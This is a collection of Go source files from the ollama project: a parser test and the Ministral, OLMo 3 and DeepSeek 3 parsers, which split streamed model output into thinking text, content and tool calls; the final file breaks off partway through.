"Here is my answer.", }, { name: "streaming thinking with newlines - granular", chunks: []string{"Step", " 1", ":", " Ana", "lyze\n", "Step", " 2", ":", " Pro", "cess", "</", "thi", "nk>", "\n", "The", " ans", "wer."}, thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "Step 1: Analyze\nStep 2: Process", expectedContent: "The answer.", }, { name: "streaming tool call - highly granular", chunks: []string{"<", "tool", "_", "call", ">", "\n", "<", "func", "tion", "=", "get", "_", "weather", ">", "\n", "<", "param", "eter", "=", "city", ">", "\n", "Par", "is", "\n", "</", "param", "eter", ">", "\n", "</", "func", "tion", ">", "\n", "</", "tool", "_", "call", ">"}, thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, { name: "streaming content then tool call - granular", chunks: []string{"Let", " me", " check", " the", " weather", ".", "\n<", "tool_call", ">", "\n", "<function=", "get_weather", ">", "\n", "<parameter=", "city", ">", "\n", "NYC", "\n", "</parameter>", "\n", "</function>", "\n", "</tool_call>"}, thinkValue: nil, expectedContent: "Let me check the weather.", expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "NYC"}), }, }, }, }, { name: "tool call tag split character by character", chunks: []string{"<", "t", "o", "o", "l", "_", "c", "a", "l", "l", ">", "\n", "<", "f", "u", "n", "c", "t", "i", "o", "n", "=", "t", "e", "s", "t", ">", "\n", "<", "/", "f", "u", "n", "c", "t", "i", "o", "n", ">", "\n", "<", "/", "t", "o", "o", "l", "_", "c", "a", "l", "l", ">"}, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "test", Arguments: api.NewToolCallFunctionArguments(), }, }, }, }, { name: "thinking close tag split character by character", chunks: []string{"I", "'", "m", " ", "t", "h", "i", "n", "k", "i", "n", "g", ".", ".", ".", "<", "/", "t", "h", "i", "n", "k", ">", "\n", "D", "o", "n", "e", "!"}, thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "I'm thinking...", expectedContent: "Done!", }, { name: "multiple whitespace after think tag - separate chunks", chunks: []string{"Thinking...", "</think>", "\n", "\n", " ", "Content here."}, thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "Thinking...", expectedContent: "Content here.", }, { name: "tool call with multiple parameters - streaming", chunks: []string{"<tool_", "call>\n", "<function", "=book_", "flight>", "\n<para", "meter=", "from>\n", "SFO\n", "</param", "eter>", "\n<param", "eter=to", ">\nNYC", "\n</para", "meter>", "\n</func", "tion>\n", "</tool_", "call>"}, thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "book_flight", Arguments: testArgs(map[string]any{ "from": "SFO", "to": "NYC", }), }, }, }, }, { name: "thinking then content then tool call - streaming", chunks: []string{"Ana", "lyzing", " your", " request", "...", "</", "think", ">\n", "I'll", " check", " that", " for", " you", ".", "\n", "<tool", "_call", ">\n", "<function", "=search", ">\n", "<parameter", "=query", ">\n", "test", " query", "\n</", "parameter", ">\n", "</function", ">\n", "</tool", "_call", ">"}, thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "Analyzing your request...", expectedContent: "I'll check that for you.", expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "search", Arguments: testArgs(map[string]any{"query": "test query"}), }, }, }, }, { name: "multiple tool calls - streaming", chunks: []string{ "<tool_call>", "\n", "<function=", "get_weather>", "\n", "<parameter=", "city>\n", "San Fran", "cisco\n", "</parameter>", "\n", "</function>", "\n", "</tool_call>", "\n", "<tool_", "call>\n", "<function", "=get_weather", ">\n", "<param", "eter=city", ">\nNew", " York\n", "</parameter>\n", "</function>\n", "</tool_call>", }, thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "San Francisco"}), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "New York"}), }, }, }, }, { name: "tool call with multiline parameter - streaming", chunks: []string{"<tool_call>\n", "<function=", "create_note>\n", "<parameter=", "content>\n", "Line 1", "\nLine", " 2\n", "Line 3", "\n</parameter>\n", "</function>\n", "</tool_call>"}, thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "create_note", Arguments: testArgs(map[string]any{"content": "Line 1\nLine 2\nLine 3"}), }, }, }, }, { name: "empty thinking block", chunks: []string{"</think>", "\n", "Just content."}, thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "", expectedContent: "Just content.", }, { name: "empty input chunks interspersed", chunks: []string{"Hello", "", " ", "", "world", "", "!"}, thinkValue: nil, expectedContent: "Hello world!", }, { name: "tool call immediately after think close - no content", chunks: []string{"Analyzing...", "</think>", "\n", "<tool_call>", "\n<function=test>\n</function>\n", "</tool_call>"}, thinkValue: &api.ThinkValue{Value: true}, expectedThinking: "Analyzing...", expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "test", Arguments: api.NewToolCallFunctionArguments(), }, }, }, }, { name: "tool call with empty parameter value", chunks: []string{"<tool_call>\n<function=test>\n<parameter=name>\n", "\n</parameter>\n</function>\n</tool_call>"}, thinkValue: nil, expectedCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "test", Arguments: testArgs(map[string]any{"name": ""}), }, }, }, }, { name: "partial tool call tag at end - buffered", chunks: []string{"Here's some content", "<tool"}, thinkValue: nil, expectedContent: "Here's some content", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { p := &Nemotron3NanoParser{} p.Init(nil, nil, tt.thinkValue) var allContent string var allThinking string var allCalls []api.ToolCall for _, chunk := range tt.chunks { content, thinking, calls, err := p.Add(chunk, false) if err != nil { t.Fatalf("unexpected error: %v", err) } allContent += content allThinking += thinking allCalls = append(allCalls, calls...) } // Drain content, thinking, calls, err := p.Add("", true) if err != nil { t.Fatalf("unexpected error on done: %v", err) } allContent += content allThinking += thinking allCalls = append(allCalls, calls...) if diff := cmp.Diff(allContent, tt.expectedContent); diff != "" { t.Errorf("content mismatch (-got +want):\n%s", diff) } if diff := cmp.Diff(allThinking, tt.expectedThinking); diff != "" { t.Errorf("thinking mismatch (-got +want):\n%s", diff) } if diff := cmp.Diff(allCalls, tt.expectedCalls, argsComparer); diff != "" { t.Errorf("calls mismatch (-got +want):\n%s", diff) } }) } } func TestNemotron3NanoParser_HasToolSupport(t *testing.T) { p := &Nemotron3NanoParser{} if !p.HasToolSupport() { t.Error("expected HasToolSupport to return true") } } func TestNemotron3NanoParser_HasThinkingSupport(t *testing.T) { p := &Nemotron3NanoParser{} if !p.HasThinkingSupport() { t.Error("expected HasThinkingSupport to return true") } } func TestNemotron3NanoParser_Init(t *testing.T) { t.Run("starts in thinking state when enabled", func(t *testing.T) { p := &Nemotron3NanoParser{} p.Init(nil, nil, &api.ThinkValue{Value: true}) if p.state != Nemotron3NanoCollectingThinking { t.Errorf("expected state Nemotron3NanoCollectingThinking, got %v", p.state) } }) t.Run("starts in content state when thinking disabled", func(t *testing.T) { p := &Nemotron3NanoParser{} p.Init(nil, nil, &api.ThinkValue{Value: false}) if p.state != Nemotron3NanoCollectingContent { t.Errorf("expected state Nemotron3NanoCollectingContent, got %v", p.state) } }) t.Run("starts in content state when nil thinkValue", func(t *testing.T) { p := &Nemotron3NanoParser{} p.Init(nil, nil, nil) if p.state != Nemotron3NanoCollectingContent { t.Errorf("expected state Nemotron3NanoCollectingContent, got %v", p.state) } }) t.Run("starts in content state with assistant prefill", func(t *testing.T) { p := &Nemotron3NanoParser{} prefill := &api.Message{Role: "assistant", Content: "Starting..."} p.Init(nil, prefill, &api.ThinkValue{Value: true}) if p.state != Nemotron3NanoCollectingContent { t.Errorf("expected state Nemotron3NanoCollectingContent, got %v", p.state) } }) } func TestNemotron3NanoParser_WithTools(t *testing.T) { tools := []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}}, }), }, }, }, } p := &Nemotron3NanoParser{} returnedTools := p.Init(tools, nil, nil) if diff := cmp.Diff(returnedTools, tools, toolsComparer); diff != "" { t.Errorf("tools mismatch (-got +want):\n%s", diff) } // Parse a tool call input := "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>" _, _, calls, err := p.Add(input, true) if err != nil { t.Fatalf("unexpected error: %v", err) } expectedCalls := []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, } if diff := cmp.Diff(calls, expectedCalls, argsComparer); diff != "" { t.Errorf("calls mismatch (-got +want):\n%s", diff) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/ministral.go
model/parsers/ministral.go
package parsers import ( "encoding/json" "fmt" "strings" "github.com/ollama/ollama/api" ) type ministralParserState int const ( ministralCollectingContent = iota ministralCollectingThinkingContent ministralCollectingToolName ministralCollectingToolArgs ) type MinistralParser struct { state ministralParserState buffer strings.Builder tools []api.Tool hasThinkingSupport bool currentTool *api.Tool } func (p *MinistralParser) HasToolSupport() bool { return true } func (p *MinistralParser) HasThinkingSupport() bool { return p.hasThinkingSupport } func (p *MinistralParser) setInitialState(lastMessage *api.Message) { prefill := lastMessage != nil && lastMessage.Role == "assistant" if !p.HasThinkingSupport() { p.state = ministralCollectingContent return } if prefill && lastMessage.Content != "" { p.state = ministralCollectingContent return } p.state = ministralCollectingThinkingContent } func (p *MinistralParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { p.tools = tools p.setInitialState(lastMessage) return tools } func toolByName(tools []api.Tool, n string) (*api.Tool, error) { for i := range tools { if tools[i].Function.Name == n { return &tools[i], nil } } return nil, fmt.Errorf("tool '%s' not found", n) } func (p *MinistralParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { p.buffer.WriteString(s) switch p.state { case ministralCollectingContent: if strings.Contains(p.buffer.String(), "[TOOL_CALLS]") { before, _ := splitAtTag(&p.buffer, "[TOOL_CALLS]", false) if before != "" { return before, "", calls, nil } p.state = ministralCollectingToolName } else if strings.Contains(p.buffer.String(), "[THINK]") { p.state = ministralCollectingThinkingContent return "", "", calls, nil } else { p.buffer.Reset() return s, "", calls, nil } case ministralCollectingThinkingContent: if strings.Contains(p.buffer.String(), "[/THINK]") { thinkingContent, after := splitAtTag(&p.buffer, "[/THINK]", true) p.state = ministralCollectingContent if after != "" { p.buffer.Reset() return after, thinkingContent, calls, nil } return "", thinkingContent, calls, nil } else { p.buffer.Reset() return "", s, calls, nil } case ministralCollectingToolName: if strings.Contains(p.buffer.String(), "[ARGS]") { name, _ := splitAtTag(&p.buffer, "[ARGS]", false) t, err := toolByName(p.tools, name) if err != nil { return "", "", calls, err } p.currentTool = t p.state = ministralCollectingToolArgs return "", "", calls, nil } return "", "", calls, nil case ministralCollectingToolArgs: if strings.Contains(p.buffer.String(), "}") { before, _ := splitAtTag(&p.buffer, "}", false) before += "}" var args api.ToolCallFunctionArguments if err := json.Unmarshal([]byte(before), &args); err != nil { // todo - throw a better error return "", "", calls, err } p.state = ministralCollectingContent call := api.ToolCall{ Function: api.ToolCallFunction{ Name: p.currentTool.Function.Name, Arguments: args, }, } calls = append(calls, call) return "", "", calls, nil } return "", "", calls, nil } return p.buffer.String(), thinking, calls, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/olmo3_think.go
model/parsers/olmo3_think.go
package parsers import ( "context" "log/slog" "strings" "unicode" "github.com/ollama/ollama/api" "github.com/ollama/ollama/logutil" ) type olmo3ThinkParserState int const ( olmo3CollectingThink olmo3ThinkParserState = iota olmo3CollectingContent ) const ( olmo3ThinkCloseTag = "</think>" ) type Olmo3ThinkParser struct { state olmo3ThinkParserState buffer strings.Builder } func (p *Olmo3ThinkParser) HasToolSupport() bool { return false } func (p *Olmo3ThinkParser) HasThinkingSupport() bool { return true } func (p *Olmo3ThinkParser) setInitialState(lastMessage *api.Message) { prefill := lastMessage != nil && lastMessage.Role == "assistant" // If prefilling with content, skip to content collection if prefill && lastMessage.Content != "" { p.state = olmo3CollectingContent return } // Model always thinks first (the <think> tag is injected in the prompt) p.state = olmo3CollectingThink } func (p *Olmo3ThinkParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { p.setInitialState(lastMessage) return tools } // Event types for internal parser communication type olmo3Event interface { isOlmo3Event() } type olmo3EventThinkContent struct { content string } type olmo3EventContent struct { content string } func (olmo3EventThinkContent) isOlmo3Event() {} func (olmo3EventContent) isOlmo3Event() {} func (p *Olmo3ThinkParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { p.buffer.WriteString(s) events := p.parseEvents() var contentSb strings.Builder var thinkingSb strings.Builder for _, event := range events { switch event := event.(type) { case olmo3EventThinkContent: thinkingSb.WriteString(event.content) case olmo3EventContent: contentSb.WriteString(event.content) } } return contentSb.String(), thinkingSb.String(), nil, nil } func (p *Olmo3ThinkParser) parseEvents() []olmo3Event { var all []olmo3Event keepLooping := true for keepLooping { var events []olmo3Event events, keepLooping = p.eat() if len(events) > 0 { all = append(all, events...) } } if len(all) > 0 { slog.Log(context.TODO(), logutil.LevelTrace, "olmo3 events parsed", "events", all, "state", p.state, "buffer", p.buffer.String()) } return all } func (p *Olmo3ThinkParser) eat() ([]olmo3Event, bool) { var events []olmo3Event bufStr := p.buffer.String() if bufStr == "" { return events, false } switch p.state { case olmo3CollectingThink: if strings.Contains(bufStr, olmo3ThinkCloseTag) { // Found complete </think> tag split := strings.SplitN(bufStr, olmo3ThinkCloseTag, 2) thinking := strings.TrimRightFunc(split[0], unicode.IsSpace) remaining := strings.TrimLeftFunc(split[1], unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) p.state = olmo3CollectingContent if len(thinking) > 0 { events = append(events, olmo3EventThinkContent{content: thinking}) } return events, true } else if overlapLen := overlap(bufStr, olmo3ThinkCloseTag); overlapLen > 0 { // Partial </think> tag - withhold ambiguous content beforePartialTag := bufStr[:len(bufStr)-overlapLen] trailingLen := trailingWhitespaceLen(beforePartialTag) ambiguousStart := len(beforePartialTag) - trailingLen unambiguous := bufStr[:ambiguousStart] ambiguous := bufStr[ambiguousStart:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = append(events, olmo3EventThinkContent{content: unambiguous}) } return events, false } else { // Regular thinking content - withhold trailing whitespace in case </think> follows whitespaceLen := trailingWhitespaceLen(bufStr) ambiguousStart := len(bufStr) - whitespaceLen unambiguous := bufStr[:ambiguousStart] ambiguous := bufStr[ambiguousStart:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = append(events, olmo3EventThinkContent{content: unambiguous}) } return events, false } case olmo3CollectingContent: // Emit all content directly p.buffer.Reset() if len(bufStr) > 0 { events = append(events, olmo3EventContent{content: bufStr}) } return events, false } return events, false }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/olmo3.go
model/parsers/olmo3.go
package parsers import ( "context" "fmt" "log/slog" "regexp" "strconv" "strings" "github.com/ollama/ollama/api" "github.com/ollama/ollama/logutil" ) type olmo3ParserState int const ( olmo3StateContent olmo3ParserState = iota olmo3StateToolCalls olmo3StateToolCallsDone ) const ( olmo3FuncCallsOpenTag = "<function_calls>" olmo3FuncCallsCloseTag = "</function_calls>" ) type Olmo3Parser struct { state olmo3ParserState buffer strings.Builder } func (p *Olmo3Parser) HasToolSupport() bool { return true } func (p *Olmo3Parser) HasThinkingSupport() bool { return false } func (p *Olmo3Parser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { p.state = olmo3StateContent return tools } type olmo3ParserEvent interface { isOlmo3ParserEvent() } type olmo3ParserEventContent struct { content string } type olmo3ParserEventToolCalls struct { calls []api.ToolCall } func (olmo3ParserEventContent) isOlmo3ParserEvent() {} func (olmo3ParserEventToolCalls) isOlmo3ParserEvent() {} func (p *Olmo3Parser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { p.buffer.WriteString(s) if done { // Drain any remaining content bufStr := p.buffer.String() p.buffer.Reset() if p.state == olmo3StateContent && len(bufStr) > 0 { return bufStr, "", nil, nil } return "", "", nil, nil } events := p.parseEvents() var contentSb strings.Builder var allCalls []api.ToolCall for _, event := range events { switch event := event.(type) { case olmo3ParserEventContent: contentSb.WriteString(event.content) case olmo3ParserEventToolCalls: allCalls = append(allCalls, event.calls...) } } return contentSb.String(), "", allCalls, nil } func (p *Olmo3Parser) parseEvents() []olmo3ParserEvent { var all []olmo3ParserEvent keepLooping := true for keepLooping { var events []olmo3ParserEvent events, keepLooping = p.eat() if len(events) > 0 { all = append(all, events...) } } if len(all) > 0 { slog.Log(context.TODO(), logutil.LevelTrace, "olmo3 events parsed", "events", all, "state", p.state, "buffer", p.buffer.String()) } return all } func (p *Olmo3Parser) eat() ([]olmo3ParserEvent, bool) { var events []olmo3ParserEvent bufStr := p.buffer.String() if bufStr == "" { return events, false } switch p.state { case olmo3StateContent: if strings.Contains(bufStr, olmo3FuncCallsOpenTag) { // Found <function_calls> tag split := strings.SplitN(bufStr, olmo3FuncCallsOpenTag, 2) content := split[0] remaining := split[1] p.buffer.Reset() p.buffer.WriteString(remaining) p.state = olmo3StateToolCalls if len(content) > 0 { events = append(events, olmo3ParserEventContent{content: content}) } return events, true } else if overlapLen := overlap(bufStr, olmo3FuncCallsOpenTag); overlapLen > 0 { // Partial <function_calls> tag - withhold ambiguous content unambiguous := bufStr[:len(bufStr)-overlapLen] ambiguous := bufStr[len(bufStr)-overlapLen:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = append(events, olmo3ParserEventContent{content: unambiguous}) } return events, false } else { // Regular content - emit all p.buffer.Reset() if len(bufStr) > 0 { events = append(events, olmo3ParserEventContent{content: bufStr}) } return events, false } case olmo3StateToolCalls: if strings.Contains(bufStr, olmo3FuncCallsCloseTag) { // Found </function_calls> tag split := strings.SplitN(bufStr, olmo3FuncCallsCloseTag, 2) toolCallsStr := split[0] remaining := split[1] p.buffer.Reset() p.buffer.WriteString(remaining) p.state = olmo3StateToolCallsDone // Parse the function calls calls, err := parseOlmo3FunctionCalls(toolCallsStr) if err != nil { slog.Log(context.TODO(), logutil.LevelTrace, "failed to parse olmo3 function calls", "error", err, "content", toolCallsStr) } else if len(calls) > 0 { events = append(events, olmo3ParserEventToolCalls{calls: calls}) } return events, true } else if overlapLen := overlap(bufStr, olmo3FuncCallsCloseTag); overlapLen > 0 { // Partial </function_calls> tag - wait for more return events, false } // Still collecting tool calls, wait for close tag return events, false case olmo3StateToolCallsDone: // After tool calls, emit remaining content p.buffer.Reset() p.state = olmo3StateContent if len(bufStr) > 0 { events = append(events, olmo3ParserEventContent{content: bufStr}) } return events, false } return events, false } // parseOlmo3FunctionCalls parses function calls in Python-esque format: // func_name(arg1="value1", arg2=123) // Multiple calls are separated by newlines func parseOlmo3FunctionCalls(s string) ([]api.ToolCall, error) { var calls []api.ToolCall s = strings.TrimSpace(s) if s == "" { return calls, nil } // Split by newlines for multiple function calls lines := strings.Split(s, "\n") for _, line := range lines { line = strings.TrimSpace(line) if line == "" { continue } call, err := parseOlmo3SingleFunctionCall(line) if err != nil { return nil, fmt.Errorf("failed to parse function call %q: %w", line, err) } calls = append(calls, call) } return calls, nil } // Regex to match function call: func_name(args) var funcCallRegex = regexp.MustCompile(`^(\w+)\((.*)\)$`) func parseOlmo3SingleFunctionCall(s string) (api.ToolCall, error) { matches := funcCallRegex.FindStringSubmatch(s) if matches == nil { return api.ToolCall{}, fmt.Errorf("invalid function call format") } funcName := matches[1] argsStr := matches[2] args, err := parseOlmo3Arguments(argsStr) if err != nil { return api.ToolCall{}, fmt.Errorf("failed to parse arguments: %w", err) } return api.ToolCall{ Function: api.ToolCallFunction{ Name: funcName, Arguments: args, }, }, nil } // parseOlmo3Arguments parses comma-separated key=value pairs // Handles nested parentheses, brackets, braces, and quoted strings func parseOlmo3Arguments(s string) (api.ToolCallFunctionArguments, error) { args := api.NewToolCallFunctionArguments() s = strings.TrimSpace(s) if s == "" { return args, nil } // Split by commas, but respect nested structures and quotes parts := splitArguments(s) for _, part := range parts { part = strings.TrimSpace(part) if part == "" { continue } // Find the first = sign eqIdx := strings.Index(part, "=") if eqIdx == -1 { return api.ToolCallFunctionArguments{}, fmt.Errorf("invalid argument format: %s", part) } key := strings.TrimSpace(part[:eqIdx]) valueStr := strings.TrimSpace(part[eqIdx+1:]) value, err := parseOlmo3Value(valueStr) if err != nil { return api.ToolCallFunctionArguments{}, fmt.Errorf("failed to parse value for %s: %w", key, err) } args.Set(key, value) } return args, nil } // splitArguments splits arguments by commas, respecting quotes and nested structures func splitArguments(s string) []string { var parts []string var current strings.Builder depth := 0 inString := false stringChar := byte(0) escaped := false for i := range s { c := s[i] if escaped { current.WriteByte(c) escaped = false continue } if c == '\\' && inString { current.WriteByte(c) escaped = true continue } if (c == '"' || c == '\'') && !inString { inString = true stringChar = c current.WriteByte(c) continue } if c == stringChar && inString { inString = false stringChar = 0 current.WriteByte(c) continue } if !inString { switch c { case '(', '[', '{': depth++ current.WriteByte(c) case ')', ']', '}': depth-- current.WriteByte(c) case ',': if depth == 0 { parts = append(parts, current.String()) current.Reset() continue } current.WriteByte(c) default: current.WriteByte(c) } } else { current.WriteByte(c) } } if current.Len() > 0 { parts = append(parts, current.String()) } return parts } // parseOlmo3Value parses a value which can be a string, number, boolean, null, array, or object func parseOlmo3Value(s string) (any, error) { s = strings.TrimSpace(s) // Check for quoted string if (strings.HasPrefix(s, `"`) && strings.HasSuffix(s, `"`)) || (strings.HasPrefix(s, `'`) && strings.HasSuffix(s, `'`)) { // Remove quotes and unescape inner := s[1 : len(s)-1] return unescapeString(inner), nil } // Check for boolean if s == "true" || s == "True" { return true, nil } if s == "false" || s == "False" { return false, nil } // Check for null/None if s == "null" || s == "None" || s == "nil" { return nil, nil } // Check for number if i, err := strconv.ParseInt(s, 10, 64); err == nil { return i, nil } if f, err := strconv.ParseFloat(s, 64); err == nil { return f, nil } // Check for array [...] if strings.HasPrefix(s, "[") && strings.HasSuffix(s, "]") { return parseOlmo3Array(s[1 : len(s)-1]) } // Check for object {...} if strings.HasPrefix(s, "{") && strings.HasSuffix(s, "}") { return parseOlmo3Object(s[1 : len(s)-1]) } // Default to string without quotes return s, nil } func parseOlmo3Array(s string) ([]any, error) { s = strings.TrimSpace(s) if s == "" { return []any{}, nil } parts := splitArguments(s) var arr []any for _, part := range parts { val, err := parseOlmo3Value(part) if err != nil { return nil, err } arr = append(arr, val) } return arr, nil } func parseOlmo3Object(s string) (map[string]any, error) { s = strings.TrimSpace(s) if s == "" { return map[string]any{}, nil } // Objects use key: value or "key": value format obj := make(map[string]any) parts := splitArguments(s) for _, part := range parts { part = strings.TrimSpace(part) if part == "" { continue } // Find colon separator colonIdx := strings.Index(part, ":") if colonIdx == -1 { return nil, fmt.Errorf("invalid object entry: %s", part) } keyStr := strings.TrimSpace(part[:colonIdx]) valueStr := strings.TrimSpace(part[colonIdx+1:]) // Remove quotes from key if present if (strings.HasPrefix(keyStr, `"`) && strings.HasSuffix(keyStr, `"`)) || (strings.HasPrefix(keyStr, `'`) && strings.HasSuffix(keyStr, `'`)) { keyStr = keyStr[1 : len(keyStr)-1] } val, err := parseOlmo3Value(valueStr) if err != nil { return nil, fmt.Errorf("failed to parse value for key %s: %w", keyStr, err) } obj[keyStr] = val } return obj, nil } func unescapeString(s string) string { // Handle common escape sequences s = strings.ReplaceAll(s, `\\`, "\x00") // Placeholder for backslash s = strings.ReplaceAll(s, `\"`, `"`) s = strings.ReplaceAll(s, `\'`, `'`) s = strings.ReplaceAll(s, `\n`, "\n") s = strings.ReplaceAll(s, `\t`, "\t") s = strings.ReplaceAll(s, `\r`, "\r") s = strings.ReplaceAll(s, "\x00", `\`) // Restore backslash return s }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/deepseek3.go
model/parsers/deepseek3.go
package parsers import ( "encoding/json" "errors" "log/slog" "strings" "unicode" "github.com/ollama/ollama/api" ) type DeepSeek3ParserState int const ( DeepSeekCollectingThinking DeepSeek3ParserState = iota DeepSeekCollectingContent DeepSeekCollectingToolCalls DeepSeekCollectingToolOutput ) const ( deepseekThinkingCloseTag = "</think>" deepseekToolCallsBeginTag = "<|tool▁calls▁begin|>" deepseekToolCallsEndTag = "<|tool▁calls▁end|>" deepseekToolCallBeginTag = "<|tool▁call▁begin|>" deepseekToolCallEndTag = "<|tool▁call▁end|>" deepseekToolSepTag = "<|tool▁sep|>" deepseekToolOutputBeginTag = "<|tool▁output▁begin|>" deepseekToolOutputEndTag = "<|tool▁output▁end|>" ) type DeepSeek3Parser struct { state DeepSeek3ParserState buffer strings.Builder hasThinkingSupport bool } func (p *DeepSeek3Parser) HasToolSupport() bool { return true } func (p *DeepSeek3Parser) HasThinkingSupport() bool { return p.hasThinkingSupport } func (p *DeepSeek3Parser) setInitialState(lastMessage *api.Message, tools []api.Tool, thinkValue *api.ThinkValue) { prefill := lastMessage != nil && lastMessage.Role == "assistant" // Check both model capability AND request preference thinkingEnabled := p.HasThinkingSupport() && (thinkValue != nil && thinkValue.Bool()) if !thinkingEnabled { p.state = DeepSeekCollectingContent return } if prefill && lastMessage.Content != "" { p.state = DeepSeekCollectingContent return } p.state = DeepSeekCollectingThinking } func (p *DeepSeek3Parser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool { p.setInitialState(lastMessage, tools, thinkValue) return tools } type deepseekEvent interface { isDeepSeekEvent() } type deepseekEventThinkingContent struct { content string } type deepseekEventContent struct { content string } type deepseekEventToolCall struct { toolCall api.ToolCall } func (deepseekEventThinkingContent) isDeepSeekEvent() {} func (deepseekEventContent) isDeepSeekEvent() {} func (deepseekEventToolCall) isDeepSeekEvent() {} func (p *DeepSeek3Parser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) { p.buffer.WriteString(s) events := p.parseEvents() var toolCalls []api.ToolCall var contentSb strings.Builder var thinkingSb strings.Builder for _, event := range events { switch event := event.(type) { case deepseekEventToolCall: toolCalls = append(toolCalls, event.toolCall) case deepseekEventThinkingContent: thinkingSb.WriteString(event.content) case deepseekEventContent: contentSb.WriteString(event.content) } } return contentSb.String(), thinkingSb.String(), toolCalls, nil } func (p *DeepSeek3Parser) parseEvents() []deepseekEvent { var all []deepseekEvent keepLooping := true for keepLooping { var events []deepseekEvent events, keepLooping = p.eat() if len(events) > 0 { all = append(all, events...) } } return all } func (p *DeepSeek3Parser) eat() ([]deepseekEvent, bool) { var events []deepseekEvent bufStr := p.buffer.String() if bufStr == "" { return events, false } switch p.state { case DeepSeekCollectingThinking: if strings.Contains(bufStr, deepseekThinkingCloseTag) { // thinking[</think>] -> content split := strings.SplitN(bufStr, deepseekThinkingCloseTag, 2) thinking := split[0] thinking = strings.TrimRightFunc(thinking, unicode.IsSpace) remaining := split[1] remaining = strings.TrimLeftFunc(remaining, unicode.IsSpace) p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingContent if len(thinking) > 0 { events = append(events, deepseekEventThinkingContent{content: thinking}) } return events, true } else if overlapLen := overlap(bufStr, deepseekThinkingCloseTag); overlapLen > 0 { // partial </think> beforePartialTag := bufStr[:len(bufStr)-overlapLen] trailingLen := trailingWhitespaceLen(beforePartialTag) ambiguousStart := len(beforePartialTag) - trailingLen unambiguous := bufStr[:ambiguousStart] ambiguous := bufStr[ambiguousStart:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = append(events, deepseekEventThinkingContent{content: unambiguous}) } return events, false } else { // otherwise its thinking content whitespaceLen := trailingWhitespaceLen(bufStr) ambiguousStart := len(bufStr) - whitespaceLen unambiguous := bufStr[:ambiguousStart] ambiguous := bufStr[ambiguousStart:] p.buffer.Reset() p.buffer.WriteString(ambiguous) if len(unambiguous) > 0 { events = append(events, deepseekEventThinkingContent{content: unambiguous}) } return events, false } case DeepSeekCollectingContent: switch { case strings.Contains(bufStr, deepseekToolCallsBeginTag): // content[<|tool▁calls▁begin|>] -> tool calls split := strings.SplitN(bufStr, deepseekToolCallsBeginTag, 2) contentBefore := strings.TrimRightFunc(split[0], unicode.IsSpace) remaining := split[1] p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingToolCalls if len(contentBefore) > 0 { events = append(events, deepseekEventContent{content: contentBefore}) } return events, true case strings.Contains(bufStr, deepseekToolOutputBeginTag): // content[<|tool▁output▁begin|>] -> tool output split := strings.SplitN(bufStr, deepseekToolOutputBeginTag, 2) contentBefore := split[0] // Don't trim whitespace - preserve spaces remaining := split[1] p.buffer.Reset() p.buffer.WriteString(remaining) p.state = DeepSeekCollectingToolOutput if len(contentBefore) > 0 { events = append(events, 